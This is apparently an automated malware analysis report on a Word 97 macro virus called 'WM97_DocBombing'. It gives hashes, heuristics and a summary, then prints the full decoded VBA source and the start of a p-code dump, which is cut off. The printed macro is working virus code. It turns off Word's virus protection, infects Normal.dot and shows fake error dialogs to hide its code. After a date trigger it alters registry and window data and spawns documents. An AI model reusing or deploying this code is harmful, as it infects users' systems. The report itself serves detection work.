Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6339e74d035eca4e…

MALICIOUS

Office (OLE)

38.0 KB Created: 2001-05-31 12:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e358705cf5ff246527159f30d1f4a488 SHA-1: aafd2fc2ff6c84e0e57ff1a19b428769c0577561 SHA-256: 6339e74d035eca4e309170045eacef6581cefcb0b9093851893cf40d18c46dda
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a VBA macro. The macro, named 'WM97_DocBombing', is designed to infect the Normal.dot template. Upon execution, it displays a fake error message to the user, likely as a distraction or to mask its malicious activity. The presence of the 'Document_Open' macro and the infection of the Normal.dot template strongly indicate a malicious intent.

Heuristics 3

  • ClamAV: Doc.Trojan.DB-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.DB-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10979 bytes
SHA-256: 327630388c09aaf66603b53a065c526fc05e777bdcb7ece2f32d8fb7ded42f39
Detection
ClamAV: Doc.Trojan.DB-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WM97_DocBombing"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
Private Sub Document_Open()
On Error Resume Next
Dim ToInfectNT As Boolean, ToInfectAD As Boolean
Dim Bcl As Integer, NTCL As Integer, ADCL As Integer

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NT.CodeModule.CountOfLines
ADCL = AD.CodeModule.CountOfLines

Options.SaveNormalPrompt = False
Options.VirusProtection = False

If (NT.Name) <> "WM97_DocBombing" Then
    NT.CodeModule.DeleteLines 1, NTCL
    ToInfectNT = True
    NT.Name = "WM97_DocBombing"
End If

If (AD.Name) <> "WM97_DocBombing" Then
    AD.CodeModule.DeleteLines 1, ADCL
    ToInfectAD = True
    AD.Name = "WM97_DocBombing"
End If

If (ToInfectNT = True And ToInfectAD = False) Then
    NT.CodeModule.InsertLines 1, "Private Sub Document_Close()"
    For Bcl = 2 To ADCL
        NT.CodeModule.InsertLines Bcl, AD.CodeModule.Lines(Bcl, 1)
    Next Bcl
    NT.CodeModule.InsertLines Bcl + 1, "Public Sub ViewVBCode()"
    NT.CodeModule.InsertLines Bcl + 2, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Visual Basic" + """"
    NT.CodeModule.InsertLines Bcl + 3, "End Sub"
    
    NT.CodeModule.InsertLines Bcl + 4, "Public Sub ToolsMacro()"
    NT.CodeModule.InsertLines Bcl + 5, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Word" + """"
    NT.CodeModule.InsertLines Bcl + 6, "End Sub"
End If

If (ToInfectNT = False And ToInfectAD = True) Then
    AD.CodeModule.InsertLines 1, "Private Sub Document_Open()"
    For Bcl = 2 To NTCL - 6
        AD.CodeModule.InsertLines Bcl, NT.CodeModule.Lines(Bcl, 1)
    Next Bcl
End If


If (Day(Now()) >= 6) Then
    If (Month(Now()) >= 11) Then
        If (Year(Now()) >= 2000) Then
            ActiveDocument.Windows.Application.Caption = "WM97_DocBombing virii !!"
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Vortex!!"
            With ActiveDocument.Comments(1)
                .Author = "WM97_DocBombing"
                .Initial = "WM97_DB"
            End With
            For Bcl = 0 To 20
                Documents.Add
            Next Bcl
        End If
    End If
End If

'*** WM97_DocBombing Macro Virus ver1.2.03 by Vortex***
'Dedicasse au Condor (on est tous avec toi, Kevin !!!)
'Remerciements egalement a Kwyjibo pour l'excellente macro 'Melissa'
'Enjoy !!
End Sub

Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub

' Processing file: /opt/analyzer/scan_staging/bee9236f15524de8b38a6faeb2c486b6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/WM97_DocBombing - 6214 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Dim 
' 	VarDefn ToInfectNT (As Boolean)
' 	VarDefn ToInfectAD (As Boolean)
' Line #4:
' 	Dim 
' 	VarDefn Bcl (As Integer)
' 	VarDefn NTCL (As Integer)
' 	VarDefn ADCL (As Integer)
' Line #5:
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001
... (truncated)